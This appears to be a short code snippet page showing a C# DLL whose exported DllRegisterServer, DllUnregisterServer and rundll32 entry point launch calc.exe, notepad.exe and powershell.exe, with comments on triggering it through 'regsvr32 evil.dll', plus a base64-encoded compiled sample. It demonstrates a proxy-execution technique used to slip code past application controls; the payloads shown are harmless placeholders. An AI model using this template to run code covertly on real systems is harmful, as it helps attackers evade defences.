opexxx
5/10/2017 - 4:29 PM

Execute a DLL via Regsvr32

Execute a DLL via Regsvr32

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace Export
{
    class Test
    {

        //
        // 
        //rundll32 entry point
        [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
        public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow )
        {
            ProcessStartInfo info = new ProcessStartInfo();
            info.FileName = "calc.exe";
            Process.Start(info);
        }
        [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
        public static void DllRegisterServer()
        {
            ProcessStartInfo info = new ProcessStartInfo();
            info.FileName = "notepad.exe";
            Process.Start(info);
        }
        [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
        public static void DllUnregisterServer()
        {
            ProcessStartInfo info = new ProcessStartInfo();
            info.FileName = "powershell.exe";
            Process.Start(info);
        }

        // To call/execute simply 
        // regsvr32 /u evil.dll -->Calls DllUnregisterServer
        // [OR] 
        // regsvr32 evil.dll --> Calls DllRegisterServer


    }
}
Base64 Encoded Sample (.NET 2.0 or Higher x64)
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYEAIT/dFcAAAAAAAAAAPAAIiALAggAAAoAAAAIAAAAAAAAnigAAAAgAAAAAACAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAAAABAAAAAAAAAMAQIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAGEAAACgAAABIKAAAUwAAAABgAABoAwAAAAAAAAAAAAAAAAAAAAAAAACAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAABAAAAAAAAAAAAAAABAgAABIAAAAAAAAAAAAAAAudGV4dAAAAKoIAAAAIAAAAAoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAACbAAAAAEAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAAaAMAAABgAAAABAAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAABAAAAAAgAAAAAIAAAAUAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAoAAAAAAAAAAAAAAAAAABIAAAAAgAFALwgAABYBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8KAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYqHgIoDgAACipecw8AAAolcgEAAHBvEAAACigRAAAKJipecw8AAAolchMAAHBvEAAACigRAAAKJipecw8AAAolcisAAHBvEAAACigRAAAKJioeAigOAAAKKgAAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAATAIAACN+AAC4AgAA3AIAACNTdHJpbmdzAAAAAJQFAABMAAAAI1VTAOAFAAAQAAAAI0dVSUQAAADwBQAAaAEAACNCbG9iAAAAAAAAAAIAAAFHVQAACQAAAAD6ATMAFgAAAQAAABIAAAADAAAABgAAAAUAAAARAAAADQAAAAEAAAABAAAAAgAAAAAAWAIBAAAAAAAGACoACgAGAFAACgAGAIAAbgAGAJcAbgAGALQAbgAGANMAbgAGAOwAbgAGAAUBbgAGACABbgAGAFoBOwEGAG4BOwEGAHwBbgAGALUBmQEGAOEB0QEGAAIC+wEGAAkCCgAKACwCGQIKAEoCGQIAAAAAAQAAAAAAAQABAAAAEABsAnQCPQABAAEAAAAQAHsCdAI9AAEAAwBgIAAAAACRAIACKQABAGIgAAAAAIYYSgAGAAIAaiAAAAAAlgCKAi8AAgCCIAAAAACWALUCOQAGAJogAAAAAJYAxwI5AAYAsiAAAAAAhhhKAAYABgAAAAEAhQIAAAEAlQIAAAIAmgIAAAMAoAIAAAQArAIJAEoAAQARAEoABgAZAEoACgAhAEoACgApAEoACgAxAEoACgA5AEoACgBBAEoACgBJAEoACgBRAEoADwBZAEoACgBhAEoACgBxAEoABgB5AEoABgCJAEoABgCJAD0CCgCRAFICGQAnAGsAFAAuADMAEwEuABMA6AAuABsABwEuACMAEwEuACsAEwEuAAsA3wAuADsABwEuAEMAGQEuAEsAEwEuAFMAEwEuAFsAMQEuAGMAWwEIAAYAPwAEgAAAAQAAAAAAAAAAAAAAAAB0AgAAAgAAAAAAAAAAAAAAIABjAgAAAAACAAAAAAAAAAAAAAAgAPsBAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQAuY3RvcgBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAU3lzdGVtLlNlY3VyaXR5AFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUAU3lzdGVtAE9iamVjdABDYWxsQ29udlN0ZGNhbGwAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NTdGFydEluZm8Ac2V0X0ZpbGVOYW1lAFByb2Nlc3MAU3RhcnQARXhwb3J0LmRsbABtc2NvcmxpYgBQcm9ncmFtAEV4cG9ydABUZXN0AE1haW4AYXJncwBFbnRyeVBvaW50AGh3bmQAaGluc3QAbHBzekNtZExpbmUAbkNtZFNob3cARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZlcgAAABFjAGEAbABjAC4AZQB4AGUAABduAG8AdABlAHAAYQBkAC4AZQB4AGUAAB1wAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAAAAAAM+I0ls/QgJIiRg0VMTjdg8ABCABAQgDIAABBCABAQ4EIAEBAgQBAAAABgABEkkSRQi3elxWGTTgiQUAAQEdDgkABCBBARgYDggFAAAgQQGAni4BgIRTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMuU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY2tleXRva2VuPWI3N2E1YzU2MTkzNGUwODkVAVQCEFNraXBWZXJpZmljYXRpb24BCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQsBAAZFeHBvcnQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTYAACkBACQ2MjgyZTQ1YS0xYTk2LTQxYWItOTMzMC1mYmQ5MzMzOTY4NTMAAAwBAAcxLjAuMC4wAAAAAEihAEAAgAAAAAD/4EihCEAAgAAAAAD/4EihEEAAgAAAAAD/4AAAAEAAAAMABgAAAAAAcCgAAAAAAAAAAAAAjigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAoAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAABIoQAgAIAAAAAA/+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAGAAAAAAQAAAYAAAAABQAABgAAAAAAAAAAhP90VwAAAACPQAAAAAAAAAMAAAADAAAAQEAAAExAAABYQAAAFigAACIoAAAuKAAAXkAAAHBAAACEQAAAAQACAAAARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZlcgBFbnRyeVBvaW50AFxFeHBvcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAAMAwAAAAAAAAAAAAAMAzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEbAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAASAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAADYABwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAHgAcABvAHIAdAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANgALAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABFAHgAcABvAHIAdAAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAD4ACwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABFAHgAcABvAHIAdAAuAGQAbABsAAAAAAAuAAcAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAeABwAG8AcgB0AAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAEAAAABioJKgwqKCoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==